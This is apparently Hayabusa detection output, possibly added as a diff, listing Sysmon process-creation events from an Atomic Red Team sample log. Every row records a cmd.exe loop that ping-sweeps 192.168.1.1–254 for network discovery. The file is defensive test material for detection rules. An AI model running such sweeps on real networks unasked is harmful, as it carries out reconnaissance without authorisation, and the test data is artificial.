+2019-07-19 23:52:02.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.56 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5656 | PGUID: 747F3D96-D912-5D31-0000-00105CB33400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:03.059 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.57 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D913-5D31-0000-00105AB63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:03.520 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.58 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D913-5D31-0000-001044B93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:04.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.59 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5968 | PGUID: 747F3D96-D914-5D31-0000-001030BC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:04.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.60 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D914-5D31-0000-00102DBF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:05.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.61 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D915-5D31-0000-001017C23400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:05.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.62 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D915-5D31-0000-001002C53400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.63 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D916-5D31-0000-0010ECC73400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.64 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D916-5D31-0000-0010B1D03400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.65 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D917-5D31-0000-00109BD33400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.66 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4052 | PGUID: 747F3D96-D917-5D31-0000-001085D63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.67 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D918-5D31-0000-00106FD93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.68 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D918-5D31-0000-001059DC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.69 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D919-5D31-0000-00109EDF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.70 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D919-5D31-0000-001088E23400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.71 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1200 | PGUID: 747F3D96-D91A-5D31-0000-001072E53400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.72 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4664 | PGUID: 747F3D96-D91A-5D31-0000-00105CE83400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.73 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D91B-5D31-0000-001046EB3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.74 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D91B-5D31-0000-00100BF43400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.75 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6080 | PGUID: 747F3D96-D91C-5D31-0000-0010F5F63400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.76 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6308 | PGUID: 747F3D96-D91C-5D31-0000-0010DFF93400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.77 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5692 | PGUID: 747F3D96-D91D-5D31-0000-0010CAFC3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.78 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-D91D-5D31-0000-0010B7FF3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.79 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6516 | PGUID: 747F3D96-D91E-5D31-0000-0010A1023500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.80 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D91E-5D31-0000-00108E053500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.81 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3164 | PGUID: 747F3D96-D91F-5D31-0000-001079083500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.82 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D91F-5D31-0000-0010640B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.83 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2288 | PGUID: 747F3D96-D920-5D31-0000-00104E0E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.84 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1684 | PGUID: 747F3D96-D920-5D31-0000-0010A6183500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.85 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D921-5D31-0000-0010921B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.86 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3744 | PGUID: 747F3D96-D921-5D31-0000-00107C1E3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.87 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D922-5D31-0000-001066213500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.88 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D922-5D31-0000-001063243500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.89 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D922-5D31-0000-001053273500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.90 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D923-5D31-0000-00103D2A3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.91 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D924-5D31-0000-0010272D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.92 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D924-5D31-0000-001024303500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.93 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D925-5D31-0000-00106C3C3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.94 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D925-5D31-0000-0010563F3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.95 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D926-5D31-0000-00101B483500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.96 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D926-5D31-0000-0010074B3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.97 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D927-5D31-0000-0010F24D3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.98 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D927-5D31-0000-0010DC503500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.99 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D928-5D31-0000-0010C7533500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.100 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D928-5D31-0000-0010B1563500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.101 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7152 | PGUID: 747F3D96-D929-5D31-0000-00109D593500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
